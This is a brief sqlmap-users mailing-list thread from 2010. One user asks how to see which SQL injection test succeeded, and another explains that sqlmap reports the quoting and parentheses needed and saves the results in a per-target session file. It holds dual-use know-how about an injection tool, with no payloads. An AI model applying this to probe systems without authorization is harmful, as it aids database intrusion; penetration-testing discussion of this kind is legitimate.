From: Ignacio Hernández [mailto:nac...@gm...]
Sent: Wednesday, January 20, 2010 06:10 p.m.
To: Duran, Beatriz
Subject: Re: [sqlmap-users] Which get was the right

Hi Beatriz

When you run sqlmap against a target and one of the tests succeeds, sqlmap tells you that. It tells you the quotes (single or double) and the number of parentheses needed to inject SQL code. On the latest versions of sqlmap it does the tests just one time and stores the data to a file, telling you where this file is each time you start sqlmap against the same target, for example:

[00:59:06] [INFO] using '/home/nacho/sqlmap/output/www.target.com/session' as session file

You can open that file and see there what test worked. Sorry about my English, I'm Spanish :)

2010/1/20 Duran, Beatriz

Hi, after you ran sqlmap to get for example, the list of tables; it gives you the query applied but how could you know which test was the one that worked? Thanks,
|
From: Duran, B. <bea...@kp...> - 2010-01-20 23:03:49
|
Hi, after you ran sqlmap to get for example, the list of tables; it gives you the query applied but how could you know which test was the one that worked? Thanks,
|